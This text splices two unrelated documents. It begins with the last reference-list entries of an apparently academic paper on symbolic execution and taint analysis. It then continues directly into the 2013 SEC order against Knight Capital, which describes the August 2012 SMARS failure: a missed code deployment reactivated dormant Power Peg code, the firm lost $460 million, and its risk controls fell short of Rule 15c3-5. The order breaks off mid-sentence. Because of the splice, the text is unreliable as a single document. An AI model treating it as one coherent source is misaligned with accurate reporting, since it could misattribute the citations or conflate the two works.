[16] J. King, “Symbolic execution and program testing,” Commu-
nications of the ACM, vol. 19, pp. 386–394, 1976.
[17] Launchpad, https://bugs.launchpad.net/ubuntu, open bugs in
Ubuntu. Checked 03/04/12.
[18] C.-K. Luk, R. Cohn, R. Muth, H. Patil, A. Klauser, G. Lowney,
S. Wallace, V . J. Reddi, and K. Hazelwood, “Pin: Building
customized program analysis tools with dynamic instrumen-
tation,” in Proc. of the ACM Conference on Programming
Language Design and Implementation, Jun. 2005.
[19] R. Majumdar and K. Sen, “Hybrid concolic testing,” in Proc.
of the ACM Conference on Software Engineering , 2007, pp.
416–426.
[20] L. Martignoni, S. McCamant, P . Poosankam, D. Song, and
P . Maniatis, “Path-exploration lifting: Hi-fi tests for lo-fi emula-tors,” in Proc. of the International Conference on Architectural
Support for Programming Languages and Operating Systems,
London, UK, Mar. 2012.
[21] A. Moser, C. Kruegel, and E. Kirda, “Exploring multiple
execution paths for malware analysis,” in Proc. of the IEEE
Symposium on Security and Privacy, 2007.
[22] T. Newsham, “Format string attacks,” Guardent, Inc., Tech.
Rep., 2000.
[23] J. Newsome and D. Song, “Dynamic taint analysis for
automatic detection, analysis, and signature generation of
exploits on commodity software,” in Proc. of the Network and
Distributed System Security Symposium, Feb. 2005.
[24] E. J. Schwartz, T. Avgerinos, and D. Brumley, “All you ever
wanted to know about dynamic taint analysis and forward
symbolic execution (but might have been afraid to ask),” in
Proc. of the IEEE Symposium on Security and Privacy , May
2010, pp. 317–331.
[25] E. J. Schwartz, T. Avgerinos, and D. Brumley, “Q: Exploithardening made easy,” in Proc. of the USENIX Security
Symposium, 2011.
[26] K. Sen, D. Marinov, and G. Agha, “CUTE: A concolic unit
testing engine for C,” in Proc. of the ACM Symposium on the
F oundations of Software Engineering, 2005.
[27] A. V . Thakur, J. Lim, A. Lal, A. Burton, E. Driscoll, M. Elder,
T. Andersen, and T. W . Reps, “Directed proof generation for
machine code,” in CA V, 2010, pp. 288–305.
[28] G. C. Vitaly Chipounov, V olodymyr Kuznetsov, “S2E: A
platform for in-vivo multi-path analysis of software systems,”
inProc. of the International Conference on Architectural
Support for Programming Languages and Operating Systems,
2011, pp. 265–278.
394 
  UNITED STATES OF AMERICA  
 Before the 
 SECURITIES AND EXCHANGE COMMISSION 
 
 
SECURITIES EXCHANGE ACT OF 1934  
Release No.  70694 / October 16, 2013 
 
ADMINISTRATIVE PROCEEDING  
File No. 3 -15570  
 
 
In the Matter of  
 Knight Capital Americas LLC  
 Respondent . 
 ORDER INSTITUTING ADMINISTRATIVE 
AND CEASE -AND- DESIST PROCEEDING S, 
PURSUANT TO SECTIONS 15(b) AND 21C OF THE SECURITIES EXCHANGE ACT OF 1934, MAKING FINDINGS, AND IMPOSING REMEDIAL SANCTIONS AND A CEASE -AND- DESIST ORDER 
   
 
I. 
 The Securities and Exchange Commission (the “Commission”) deems it appropriate and in 
the public interest that public administrative and cease- and-desist proceeding s be, and hereby are, 
instituted pursuant to Sections 15(b) and 21C of the Securities Exchan ge Act of 1934 (the 
“Exchange Act”) against Knight Capital Americas LLC (“Knight” or  “Respondent”).  
II. 
 In anticipation of the institution of th ese proceeding s, Respondent has submitted an Offer 
of Settlement (the “Offer”), which the Commission has determined to accept.  Solely  for the 
purpose of th ese proceeding s and any other proceedings by or on behalf of the Commission, or to 
which the Commission is a party, and without admitting or denying the findings herein, except as to the  Commission’s jurisdictio n over it and the subject matter of these proceedings, which are 
admitted , Respondent consent s to the entry of this Order Instituting Administrative  and 
Cease- and-Desist Proceeding s, Pursuant to Sections 15(b) and 21C of the Securities Exchange Act 
of 1934, Making Findings, and Imposing Remedial Sanctions and a Cease -and-Desist Order 
(“Order”), as set forth below:  
III. 
 On the basis of this Order and Respondent ’s Offer, the Commission  finds that:  
2 
 INTRODUCTION 
1. On August 1, 2012, Knight Capital Americas LLC (“Knight”) experienced a 
significant error in the operation of its automated  routing system  for equity orders , known as 
SMARS.  While  processing 212 small retail orders  that Knight ha d received from its customers , 
SMARS routed millions of orders into the market over a 45- minute period, and obtained over 4 
million executions in 154 stocks for more than 397 million shares.  By the time that Knight 
stopped sending the orders, Knight had a ssumed a net long position in 80 stocks of approximately 
$3.5 billion and a net short position in 74 stocks of approximately $3.15 billion.  Ultimately, Knight lost over $460 million from  these unwanted positions.  The subject of these proceedings  is 
Knigh t’s violation of a Commission rule that requires brokers or dealers to have controls and 
procedures in place reasonably designed to limit the risk s associated with their access to the 
markets, including the risks associated with automated systems and the p ossibility of these types of 
errors . 
2. Automated  trading is an increasingly important component of the national market 
system.   Automated trading typically occurs through or by broker s or dealers that have direct 
access to the national securities exchanges and other trading centers .  Retail and institutional 
investors alike rely on these broker s, and their technology and systems, to access the markets.   
3. Although automated technology brings benefits to investors, including increased 
execution speed  and some decreased costs, automated trading  also amplifies certain  risks.   As 
market participants increasingly rely on computers to make order routing and execution decisions, it is essential that compliance and risk management functions at broker s or dealers keep pace.  In 
the absence of appropriate controls, t he speed with which automated trading systems enter orders 
into the marketplace can turn an otherwise manageable error into an extreme event  with potentially 
wide -spread impact .     
4. Prudent technology risk management  has, at its core, quality assurance, continuous 
improvement, controlled testing and user acceptance, process measuring, management and control, regular and rigorous review for compliance with applicable rules and regulations and a strong and ind ependent audit process.  To ensure these basic features are present and incorporated 
into day -to-day operations , broker s or dealer s must invest appropriate resources in their 
technology, compliance , and supervisory infrastructures.  Recent events and Commi ssion 
enforcement actions
1 have demonstrated that this investment must be supported by an equally 
strong commitment to prioritize technology governance with a view toward preventing, wherever possible, software malfunctions, system errors and failures, out ages or other contingencies and, 
                                                 
1  See , e.g., In the Matter of the NASDAQ Stock Market LLC, et al. , Sec. Exch. Rel. No. 69655 (May 29, 
2013) (available at http://www.sec.gov/litigation/admin/2013/34 -69655.pdf ) (violations occurred as a 
result of system design limitations and weaknesses in processes and procedures) ; In the Matter of New 
York Stock Exchange LLC, et al., Sec. Exch. Rel. No. 67857 (Sept. 14, 2012) (available at 
http://www.sec.gov/litigation/admin/2012/34- 67857.pdf ) (violations occurred after compliance department 
played no role in design, implementation, or operation of market data systems); In the Matter of EDGX 
Exchange, Inc., et al., Sec. Exch. Rel. No. 65556 (Oct. 13, 2011) (available at 
http://www.sec.gov/litigation/admin/2011/34- 65556.pdf ) (violations oc curred against backdrop of 
weaknesses in systems, processes, and controls).  
3 
 when such issues arise, ensur ing a prompt, effective, and risk- mitigating response.  The failure 
by, or unwillingness of, a firm to do so can have potentially catastrophic consequences for the 
firm, its customers, their cou nterparties, investors and the marketplace.      
5. The Commission adopted Exchange Act Rule 15c3 -52 in November 2010 to require 
that broker s or dealers, as gatekeepers to the financial markets , “appropriately control the risks 
associated with market access, so as not to jeopardize their own financial condition, that of other 
market participants, the integrity of trading on the securities markets, and the stability of the 
financial system .”3   
6. Subsection (b) of Rule 15c3 -5 requires broker s or dealers with market access to 
“establish, document, and maintain a system of risk management controls and supervisory 
procedures reasonably designed to manage the financial, regulatory, and other risks” of having market access.   The r ule addresses a range of market acc ess arrangements, including customers 
direct ing their own trading while using a broker ’s market participant identifications, brokers 
trading for their customers as agents, and a broker -dealer ’s trading activities that place its own 
capital at risk .  Subsec tion (b) also requires a broker or dealer to preserve a copy of its supervisory 
procedures and a written description of its risk management controls as part of its books and records.  
7. Subsection (c) of Rule 15c3- 5 identifies  specific required elements of a broker or 
dealer’s risk management controls  and supervisory procedures .  A broker or dealer must have 
systematic financial risk management controls and supervisory procedures that are reasonably 
designed to prevent the entry of erroneous orders and orders that  exceed pre- set credit and capital 
thresholds  in the aggregate for each customer and the broker or dealer .  In addition, a broker or 
dealer must have regulatory risk management controls  and supervisory procedures that are 
reasonably designed to ensure compliance with all regulatory requirements .   
8. Subsection (e) of Rule 15c3- 5 requires brokers or  dealers with market access to 
establish, document, and maintain a system for regularly reviewing the effectiveness of their risk management controls and supervisory procedures.  This sub- section also requires that the C hief 
Executive O fficer (“CEO”) review and certify that the controls and procedures comply with 
subsections (b) and (c) of the rule.  These requirements are intended to assure compliance on an 
ongoing basis, in part by charging senior management with responsibility to regularly review and certify the effectiveness of the controls.
4   
9. Beginning no later than July 14, 2011, and continuing through at least August 1, 
2012, Knight’s system of risk ma nagement controls and supervisory procedures was not 
reasonably designed to manage the risk of its market access .  In addition, Knight’s internal 
                                                 
2  17 C.F.R. § 240.15c3- 5.  The initial compliance date for Rule 15c3- 5 was July 14, 2011.  On June 30, 
2011, the Commission extended the compliance date for certain requirements o f Rule 15c3- 5 until 
November 30, 2011.  
3  Risk Management Controls for Brokers or Dealers with Market Access, 75 Fed. Reg. 69792, 69792 
(Nov. 15, 2010) (final rule release).  
4  Id. at 69811.  
4 
 reviews were inadequate, its  annual  CEO certification for 2012 was defective, and its written 
description of i ts risk management controls  was insufficient .  Accordingly, Knight violated Rule 
15c3- 5.  In particular:   
A. Knight did not have controls reasonably designed to prevent the entry of 
erroneous orders at a point immediately prior to the submission of orders to  
the market by one of Knight’s equity order routers, as required under Rule 15c3- 5(c)(1)(ii);  
B. Knight did not have controls reasonably designed  to prevent it from 
entering orders for equity securities that exceeded  pre-set capital threshold s 
for the firm , in the aggregate, as required under Rule 15c3- 5(c)(1)(i).  In 
particular, Knight failed to link accounts to firm -wide capital thresholds , 
and Knight relied on financial risk controls that were not capable of 
preventing the entry of orders ;  
C. Knight did not have  an adequate  written description of its risk management 
controls as part of its books and records in a manner consistent with Rule 
17a-4(e)(7) of the Exchange Act, as required by Rule 15c3- 5(b);  
D. Knight also violated the requirements of Rule  15c3- 5(b) because Knight did 
not have technology governance controls and supervisory procedures 
sufficient to ensure the orderly deployment of new code  or to prevent the 
activation of code  no longer intended for use in Knight’s current operations 
but left on its serv ers that were accessing the market ; and Knight did not 
have  controls and supervisory procedures reasonably designed to guide 
employees’ response s to significant technological  and compliance 
incidents ;  
E. Knight did not adequately review its business activity  in connection with its 
market access to assure the overall effectiveness of its risk management controls and supervisory procedures, a s required by Rule 15c3 -5(e)(1); and  
F. Knight’s 2012 annual CEO certification was  defective because it did not 
certify that Knight’s  risk management controls and supervisory procedures 
complied with paragraphs (b) and (c) of Rule 15c3- 5, as required by Rule 
15c3- 5(e)(2).  
10. As a result of these failures, Knight did not have a system of risk management 
control s and supervisory procedures reasonably designed to manage the financial, regulatory, and 
other risks of market access  on August 1, 2012, when it experienced a significant  operational 
failure that affected SMARS , one of the primary  systems Knight uses to s end orders to the market .  
While Knight’s technology staff worked to identify and resolve the issue, Knight remained connected to the markets and continued to send orders  in certain listed securities .  Knight’s 
failure s resulted in it accumulating a n unint ended  multi- billion dollar portfolio of securities in  
approximately forty -five minutes  on August 1 and, ultimately, Knight lost more than $460 million , 
experienced net capital problems , and violated Rules 200(g) and 203(b) of Regulation SHO .     
5 
 FACT S 
A. Respondent  
11. Knight Capital Americas LLC  (“Knight”) is a U.S. -based broker -dealer and a 
wholly -owned subsidiary of KCG Holdings, Inc .  Knight was owned by Knight Capital Group, 
Inc. until July 1, 2013, when that entity and GETC O Holding Company, LLC  combined to form 
KCG Holdings, Inc.  Knight is registered with the Commission pursuant to Section 15 of the 
Exchange Act and is a Financial Industry Regulatory Authority (“FINRA”) member.  Knight has 
its principal business operations in Jersey City, New Jersey.  Throughout 2011 and 2012, 
Knight’s aggregate trading (both for itself and for its customers) generally represented approximately ten percent  of all trading in listed U.S. equity securities.  SMARS generally 
represented approximately one percent  or more of al l trading in listed U.S. equity securities.  
B. August 1 , 2012 and Related Events  
 Preparation for NYSE Retail Liquidity Program  
12. To enable its customers’ participation in the  Retail Liquidity Program (“RLP”) at 
the New York Stock Exchange,5 which was scheduled to commence on August 1, 2012, Knight 
made a number of changes to its systems and software  code related to its order handling processes .  
These changes included developing and deploying new software code in SMARS.  SMARS is a n 
automate d, high speed, algorithmic router that sends orders into the market for execution.  A core 
function of SMARS is to receive orders  passed from other components of Knight’s trading 
platform  (“parent” orders) and then, as needed based on the available liquidi ty, send one or more 
representative (or “child”) orders to external venues for execution.   
13. Upon deployment, the new RLP code in SMARS was intended to replace unused 
code in the relevant portion of the order router.  This unused code previously had been used for 
functionality  called “Power Peg,” which  Knight had discontinued using many years earlier.   
Despite the lack of use, the Power Peg functionality remained present  and callable at the time of  
the RLP deployment.  The  new RLP cod e also repurp osed a flag that was  formerly used to 
activate the Power Peg code.   Knight intended to delete the Power Peg code so that when this flag 
was set to “yes,” the new RLP functionality —rather than Power Peg —would be engaged.  
14. When Knight used the Power Peg code previously , as child orders were executed, a 
cumulative quantity function counted the number of shares of  the parent order  that had been 
executed .  This feature instructed the code to stop routing child orders  after  the parent order had 
been filled complet ely.  In 2003, Knight ceased using the Power Peg  functionality .  In 2005, 
Knight moved the tracking of cumulative shares function in the Power Peg code to an earlier point 
in the SMARS code sequence .  Knight did not retest the Power Peg code after moving t he 
cumulative quantity function to determine whether Power Peg would still function correctly if called .   
                                                 
5  See  Release No. 34- 67347 (July 3, 2012) (order granting approval to NYSE proposed rule changes to 
establish a retail liquidity program for NYSE -listed securities and NYSE Amex equities on a 12- month 
pilot basis and granting exemptions from Rule 612(c) of Regulation NMS).  
6 
 15. Beginning on July 27, 2012, Knight deployed the new RLP code in SMARS in  
stages by placing it on a limited number of servers in SMARS on successive days.  During the 
deployment of the new code, however, one of Knight’s technicians did not  copy the new code to 
one of the eight SMARS computer servers.  Knight did not have a second technician review this 
deployment and no one at Knight realized that the P ower Peg code had not been removed from the 
eighth server , nor the new RLP code added.  Knight had no written procedures that required such 
a review.  
 Events of August 1, 2012 
16. On August 1, Knight received orders from broker -dealers whose customers were 
eligible to participate in the RLP.  The seven servers  that received the new code processed these 
orders correctly.  However, orders sent  with the repurposed flag  to the eighth server triggered the 
defective Power Peg code still present on that server.  As a result, this server began sending child 
orders to certain trading centers for execution.  Because the cumulative quantity function had been moved, this server continuously sent child orders, in rapid sequence, for each incoming parent order without rega rd to the number of share executions  Knight  had already  received from 
trading centers.  Although one part of Knight’s order handling system recognized that the parent orders had be en filled, this information was not communicated to SMARS.    
17. The consequences of the failures were substantial.  For the 212 incoming parent 
orders  that were processed by the defective Power  Peg code, SMARS sent millions of child orders, 
resulting in 4 million executions  in 154 stocks for more than 397 million shares  in approximat ely 
45 minutes.  Knight inadvert ently assumed a n approximately  $3.5 billion net long position in 80 
stocks  and a n approximately  $3.15 billion net short position in 74 stocks .  Ultimately, Knight 
realized a $4 60 million loss on these positions.  
18. The millions of erroneous  executions influenced share prices during the 45 minute 
period.  For example, for 75 of the stocks, Knight’s executions comprised more than 20 percent of 
the trading volume and contributed to price moves of greater than five percen t.  As to 37 of those  
stocks , the price moved by  greater than ten percent , and Knight’s executions constituted more than 
50 percent of the trading volume .  These share price movements  affected other market 
participants, with  some participants receiv ing less favorable prices than they would have in the 
absence of these executions  and other s receiv ing more favorable prices.  
BNET Reject E -mail Messages  
19. On August 1, Knight also received orders eligible for the RLP but that were  
designated for pre -market trading.6  SMARS processed t hese orders and, beginning at 
approximately 8:01 a.m. ET, an internal system at Knight generated automated e -mail messages 
(called “ BNET rejects ”) that referenced SMARS and identified an error described as “Power Peg  
disabled .”  Knight’s system sent 97 of these  e-mail messages to a group of Knight personnel 
before the 9:30 a.m. market open.  Knight did not design these types of messages to be system 
alerts , and Knight personnel generally did not review them when they were received.  However, 
                                                 
6  These orders were distinct from the 212 incoming parent orders that led to the executions described 
above. 
7 
 these messages were sent in real  time, were caused by  the code deployment failure, and provided 
Knight with a potential opportunity to identify and fix the coding issue prior to the market open.  
These notifications were not acted upon before the market opened  and were not used to diagnose 
the problem after the open. 
C. Controls and Supervisory Procedures  
SMARS  
20. Knight had a number of controls in place prior  to the point that orders reached 
SMARS .  In particular, Knight’s customer interface, internal order management system, and 
system for internally executing customer orders all contained controls concerning the prevention 
of the  entry of erroneous orders.   
21. However, Knight  did not have adequate  controls in SMARS to prevent the entry of 
erroneous orders.  For example, Knight did not have sufficient  control s to monitor the output  
from SMARS, such as a control to compare orders leaving SMARS with those that entered it.  
Knight also did not have procedures in place to halt SMARS’s operations in response to its own aberrant activity. Knight had a control that capped the limit price on a parent order, and therefore related child orders, at 9.5 percent below the  National Best Bid (fo r sell orders) or above the 
National Best Offer  (for buy orders) for the stock at the time that SMARS had received the parent 
order.  However, this control would not prevent the entry of erroneous orders in circumstances in 
which the National Best Bid or Offer  moved by less than 9.5 percent.  Further, it did not apply to 
orders —such  as the 212 orders  described above —that Knight  received before the market open and 
intended to send to participate in the opening auction at the primary listing exchange for the stock.       
Capital Thr esholds  
22. Although Knight had position limits for some  of its trading groups , these limits did 
not account for the firm’s exposure from outstanding orders.  Knight also did not have pre -set 
capital  thresholds  in the aggregate  for the firm that were linked to automated controls that would 
prevent the entry of orders if the thresholds were exceeded .   
23. For example, Knight had an account —designated the 33 Account —that 
temporarily held  multiple types of positions, including positio ns resulting from execution s that 
Knight received back  from the market s that its systems could not match to the unfilled quantity of 
a parent  order .  Knight assigned a $2 million gross position limit to the 33 Account, but it did not 
link this account to a ny automated controls concerning Knight’s overall financial exposure.     
24. On the morning of August 1, the 33 A ccount began accumulating an unusually 
large position resulting from the millions of executions of the child orders that SMARS  was 
sending to the market .  Because Knight did not link the  33 Account to pre -set, firm -wide  capital 
thresholds  that would prevent the entry of orders, on an automated basis, that exceeded those 
thresholds , SMARS continued to send millions of child orders to the market  despi te the fact that 
the parent orders already had been completely filled .7  Moreover, because the 33 Account held 
                                                 
7  Knight does have automatic shutdown of its trading with respect to certain strategies of one of its trading 
groups when their P&L  limits are exceeded.  
8 
 positions  from multiple sources , Knight personnel could not quickly determine the nature or 
source of the positions accumulating in the 33 Account on the morning of August 1.   
25. Knight’s primary risk monitoring tool , known as “PMON ,” is a post -execution 
position monitoring system.   At the opening of the market, senior Knight personnel  observed a 
large volume of positions accruing in the 33 Account.  However, Knight did not link this tool  to 
its entry of orders so that the entry of orders in the market would automatically stop when Knight 
exceeded pre- set capital thresholds  or its gross position limits .  PMON relied entirely on human 
monitoring and did not generat e automated alerts regarding the firm’s financial exposure.  PMON 
also did not display the limits for the account s or trading groups;  the person viewing PMON had to 
know the applicable limits to recognize that a limit had been exceeded.  PMON experienced 
delays  during high volume event s, such as the one experienced on  August 1 , resulting in reports 
that were inaccurate.        
Code Development and Deployment       
26. Knight did not have written code development and deployment procedures for 
SMARS (although other groups at Knight had written procedures), and Knight did not require a 
second technician  to review code deployment  in SMARS .  Knight also did not have a written 
protocol concerning the accessing of unused code on its production servers, such as a protocol requiring the testing of any such code after it had been accessed to ensure that the code still functioned properly.       
Incident Response  
27. On August 1, Knight did not have supervisory procedures concerning incident 
response.  More specifically, Knight did not have supervisory procedures to guide its relevant personnel  when significant issues developed.  On August 1, Knight r elied primarily on its 
technology team to attempt to identify and address the SMARS problem in a live trading environment.  Knight ’s system  continued to send millions of child  orders while its personnel 
attempted to identify the source of the problem .  In one of its attempts to address the problem, 
Knight uninstalled the new RLP code from the seven servers where it had been deployed correctly.  This action worsened the problem, causing additional  incoming parent  orders to activate the Power 
Peg code that was present on those servers, similar to what had already occurred on the eighth server.    
D. 
Compliance Review s and Written Description  of Controls  
Initial Assessment of Compliance  
28. Knight’s assessment of its controls and procedures began prior to the July 14, 2011 
compliance date.  Knight’s compliance department initiated the assessment, which involved discussions among staff of that department, as well as the pertinent business and technology units.  The participants concluded that Knight’s system of contr ols satisfied Rule 15c3- 5.  The 
assessment largely focused on compiling an inventory of Knight’s existing controls  and 
confirming that they functioned as intended.  T he assessment did not consider possible problems 
within SMARS or the consequences of  potential malfunctions  in SMARS.  This assessment also 
did not consider PMON’s inability to prevent the entry of orders that would exceed a capital 
9 
 threshold.  Further, Knight did not document sufficiently the evaluation done of the controls so 
that subsequent reviewers could identify these gaps in the assessment.   
Written Description  
29. During the initial assessment, the compliance department prepared a document that 
listed Knight’s systems and some of the controls.  This document was incomplete and therefore 
did not  satisfy the documentation requirements of Rule 15c3- 5(b).  In September 2011, nearly 
two months after the compliance date of Rule 15c3- 5’s provision requiring the written description 
of the risk management controls , the compliance department drafted a  narrative intended to 
describe Knight’s market access systems and controls .  This document also was incomplete , and  
was inaccurate in some respects.  For example, the narrative omitted Knight’s proprietary Electronic Trading Group  (“ETG”) , which was a sig nificant source of Knight’s trading and order 
volumes .  The compliance department and supervisory control group (“SCG”), working together 
with pertinent business and technology units, began to address the missing elements of the document in November 2011, which resulted in a revised draft in January 2012, nearly six months 
after the compliance date  of Rule 15c3- 5(b).  Although this draft included aspects of ETG, it 
lacked the Lead Market Making (“LMM”) d esk and other important systems.  As of the CEO 
certif ication in March 2012, discussed below, Knight still was adding key systems and controls to 
the document.  Prior to certification, the CEO was informed about the pending revisions.  It was 
not until July 2012, nearly a year after the compliance date, that Knight added the LMM desk, which had experienced erroneous trade events over the previous months.   
Written Supervisory Procedures  
30. In August 2011, subsequent to the compliance date of Rule 15c3- 5’s provision 
requiring written supervisory procedures , Knight adopted written supervisory procedures 
(“WSPs ”) to guide regular reviews of its compliance with Rule 15c3- 5.  Knight’s c ompliance 
department drafted the WSPs , which assigned various tasks to be performed by SCG staff in 
consultation with the perti nent business and technology units.  Taken together, the WSPs had the 
goal of evaluating the reasonableness of Knight’s market access controls and Knight’s compliance with Rule 15c3- 5 on an ongoing basis .  Each WSP required a senior member of the pertinent  
business unit to approve the work of the SCG staff.  Further, a separate compliance department procedure required a compliance analyst twice a year to review the work done under the WSPs .   
31. Some of the WSPs were incomplete as written, and  Knight personnel  had 
conflicting views regarding what some of the WSPs required.  For example, relevant Knight personnel differed on whether some WSPs required an evaluation of the controls or merely an identification that controls and procedures existed.  In addition, th e WSP  that was supposed to 
requir e an evaluation of the reasonableness of Knight’s cont rols only required a review of certain 
types of controls and did not require an evaluation of controls to reject orders that exceed pre- set 
capital thresholds in the agg regate for the firm or that indicate duplicative orders.      
Post-Compliance Date Review s 
32.  Knight conducted periodic reviews pursuant to the WSPs .  As explained above, 
the WSPs assigned various tasks to be performed by SCG staff in consultation with the pertinent 
10 
 business and technology units, with a senior member of the pertinent business unit reviewing and 
approving that work.  T hese review s did not  consider whether Knight needed controls to limit the 
risk that SMARS could malfunction, nor did these reviews consider whether Knight  need ed 
controls concerning  code deployment or unused code residing on servers.  Before undertaking 
any evaluation of Knig ht’s controls, SCG , along with business and technology staff, had to spend 
significant time and effort identifying the missing content and correcting the inaccuracies in the written description.       
33. Several previous events presented an opportunity for Kni ght to review the 
adequacy of its controls in their entirety.   For example, in October 2011, Knight used test data to 
perform a weekend disaster recovery test.  After the test concluded, Knight ’s LMM desk 
mistakenly continued to use the test data to genera te automated quotes when trading began that 
Monday morning.  Knight experienced a  nearly  $7.5 million loss as a result of this event.   Knight 
responded to the event by limiting the operation of the system to market hours, changing the control so that th is system  would stop providing quotes  after receiving an execution, and adding an 
item to a disaster recovery checklist that required a check of the test data.  Knight did not broadly consider whether it had sufficient controls to prevent the entry of erroneous orders, regardless of the specific system that sent the orders or the particular reason for that system’s error.   Knight also 
did not  have a mechanism to test whether their systems were relying on stale data.   
E. 
CEO Certific ation  
34. In March 2012, Knight’s CEO signed a certification concerning Rule 15c3- 5.  The 
certification did not state that Knight’s controls and procedures complied with the rule .  Instead , 
the certification stated that Knight had in place “ processes” to comply with the rule.  This drafting 
error was not intentional, the CEO did not notice the error, and the CEO believed at the time that he 
was certifying that Knight’s controls and procedures complied with the rule.8 
F. Collateral Consequences    
35. There were collateral consequences as a result of the August 1 event , including 
significant net capital problems .  In addition, m any of the millions of orders that SMARS sent on 
August 1 were short sale orders .  Knight did not mark these orders as short sales, as required by 
Rule 200(g) of Regulation SHO.9  Similarly, Rule 203(b) of Regulation SHO prohibits a broker or 
dealer from accepting a short sale or der in an equity security from another person, or effecting a 
short sale in an equity security for its own a ccount, unless it has borrowed the security , entered into 
a bona -fide arrangement to borrow the security, or has reasonable grounds to believe that the 
security can be borrowed so that it can be delivered on the date delivery is due (known as the “locate” requirement) , and has documented compliance with this requirement .
10  Knight did not 
                                                 
8  Before signing the certification, the CEO received a report concerning reviews that Knight personnel 
had performed pursuant to the WSPs.  The report contained sub- certifications from eight senior Knight 
employees.  Although the re port contained a similar drafting error as the certification, all of the employees 
who signed the report to the CEO believed that Knight was in compliance with Rule 15c3 -5. 
9  17 C.F.R. § 242.200(g). 
10  17 C.F.R. § 242.203(b).  
11 
 obtain a  “locate ” in connection with Knight’s unintended orders  and did not document compliance 
with the requirement with respect to Knight’s unintended orders . 
VIOLATIONS  
A. Market Access Rule:  Section 15(c)(3) of the Exchange Act and Rule 15c3 -5 
36. Section 15(c)(3) of the Exchange Act , among other things, prohibits a broker  or 
dealer from effecting any securities transaction in contravention of the rules and regulations the 
Commission prescribes as necessary or appropriate in the public interest , or for the protection of 
investors , to provide safeguards with respect to the financial responsibility and related practices of 
broker s or dealers.   Knight violated this Section thro ugh its violations, described below, of a  rule 
promulgated by the Commission thereunder.  
37. Subsection (c)(1)(i) of Rule 15c3- 5 requires  that a broker or dealer’s risk 
management controls and supervisory procedures shall be reasonably designed to prevent systematically the entry of orders that exceed appropriate pre -set credit or capital thresholds in the 
aggregate for each customer and the broker or dealer.  Knight violated this requirement by failing 
to link pre -set capital thresholds to Knight’s entry of or ders so that Knight would stop sending 
orders when it breached such thresholds.  Instead, Knight relied on tools, including PMON, that 
were not capable of preventing the entry of orders whose execution would exceed a capital threshold and did not link the 33 Account to pre -set capital thresholds.   These inadequacies 
contributed to Knight’s failure to detect promptly the severity of, and to resolve  quickly , the 
problems on August 1 or to mitigate the effects  prior to the resolution of the software issue . 
38. Subsection (c)(1)(ii) of Rule 15c3- 5 requires that a broker or dealer’s risk 
management controls and supervisory procedures be reasonably designed to prevent systematically the entry of erroneous orders that exceed appropriate price or size parameters on an order -by-order basis or over a short period of time, or that indicate duplicative orders.  Knight 
violated this requirement by failing to have controls  reasonably designed  to prevent the entry of  
erroneous orders at a point immediately prior to the submissi on of orders to the market by 
SMARS , which  had the core function of  dividing parent orders into child orders and sending them 
to the market .  The controls that Knight had in place  were  not reasonably designed to limit  
Knight’s financial exposure arising from  errors  within SMARS , such as problems in the operation 
of the software that sent child orders to fill parent orders .  As evidenced by the events of August 1, 
the absence of adequate controls at the point immediately prior to Knight’s submission of orders to the market left Knight vulnerable to the financial and regulatory risks of Knight’s erroneous entry of orders  and had substantial consequences to both Knight and the market .   
39. Subsection (b) of Rule 15c3 -5 requires, among other things, that a broker  or dealer 
preserve a copy of its supervisory procedures and a written description of its risk management controls as part of its books and records in a manner consistent with Rule 17a -4(e)(7).  As 
highlighted in the Adopting Release, this document serves the purpose of assisting Commission and Self -Regulatory Organization staff during an examination of the broker or dealer for 
compliance with the rule.
11  It also assists the broker or dealer in conducting the reviews and 
                                                 
11  75 Fed. Reg. at 69812.  
12 
 performing the certification require d by the rule.  Knight violated this requirement by failing to 
have a n adequate  written description of its risk management controls.  Knight did attempt to 
create a narrative of its risk management controls after the compliance  date of Rule 15c3 -5, but thi s 
document remained incomplete and, in some instances, inaccurate through the summer of 2012.  
The insufficiencies in this document adversely affected the quality of the reviews Knight 
conducted of its risk controls after the compliance date of Rule 15c3- 5.  As described above, 
Knight’s staff had to spend considerable time and effort identifying the missing content and 
correcting the inaccuracies in this document before they could evaluate Knight’s controls.  
40. Knight also violated the overarching requirement  of subsection (b) of Rule 15c3- 5 
that brokers or dealers “shall  establish, document, and maintain a system of risk management 
controls and supervisory procedures reasonably designed to manage the financial, regulatory, and 
other risks of” its market access .  As explained above, Knight lack ed adequate controls for its 
order router and failed to have a n automated control  to prevent the entry of orders  that exceeded 
firm-wide pre -set capital thresholds .  Knight also lacked reasonably  designed controls an d 
supervisory procedures to detect and prevent software malfunctions that can result from code development and deployment.   
41. For example, a written procedure requiring a simple double -check of the 
deployment of the RLP code could have identified that a ser ver had been missed and averted the 
events of August 1.  Having a procedure that integrated the BNET Reject messages into Knight’s 
monitoring of its systems likewise could have prevented the events of August 1.  Further, in 2003, 
Knight elected to leave th e Power  Peg code on SMAR S’s production servers, and, in 2005, 
accessed this code to use the cumulative quantity functionality in another application without taking measures to safeguard against malfunctions or inadvertent activation.  A written protocol 
requiring the retesting of the Power  Peg code in 2005 could have identified that Knight had 
inadvertently disabled the cumulative quantity  functionality in the Power Peg code.   Th ese 
shortcoming s were made more consequential by the fact that Knight did not have controls in 
SMARS that were sufficient to address the risk posed by possible problems in the operation of the software as it sent child orders to fill a parent order.   
42. Further, Knight did not have adequate controls and supervisory procedures to guide 
employees’ response to incidents such as what occurred on August 1.  In light of Knight’s market 
access, Knight needed clear guidance for its technology personnel as to when to disconnect a malfunctioning system from the market.  
43. Subsection (e) of Rule 15c3 -5 requires that a broker or dealer establish, document, 
and maintain a system for regularly reviewing the effectiveness of the risk management controls and supervisory procedures required by Rule 15c3- 5(b) and (c).  Subsection (e)(1) of Rule 15c3- 5 
requires, among other things, that a broker or dealer review, no less frequently than annually, the 
business activity of the broker or dealer in connection with market access to assure the overall effectiveness of such risk management controls and supervisor y procedures.  Reasonably 
designed WSP s are an important component of the system required by the rule , because they  help 
ensure that the broker or dealer fulfills its obligations to conduct a review of the overall effectiveness of its risk management contr ols and supervisory procedures. 
13 
 44. Knight violated s ubsection (e) of Rule 15c3- 5 because  its system for regularly 
reviewing the effectiveness of its risk management controls was inadequate.  For example, 
Knight’s WSPs were incomplete as written and did not pr ovide clear guidance as t o what they 
required.  Further, Knight’s initial assessment of its market access controls did not sufficiently 
consider whether the controls were reasonably designed to manage Knight’s market access risks or 
whether Knight needed a dditional controls.  T his review , and the post -complian ce date reviews , 
failed to consider adequately the risks posed by possible malfunctions in SMARS, one of Knight’s 
primary systems for accessing the markets , and failed to consider Knight’s inability to  prevent the 
entry of orders whose execution would exceed  pre-set capital thresholds .  These reviews also 
failed to assess adequately the consequences of Knight’s reliance on PMON as a primary risk 
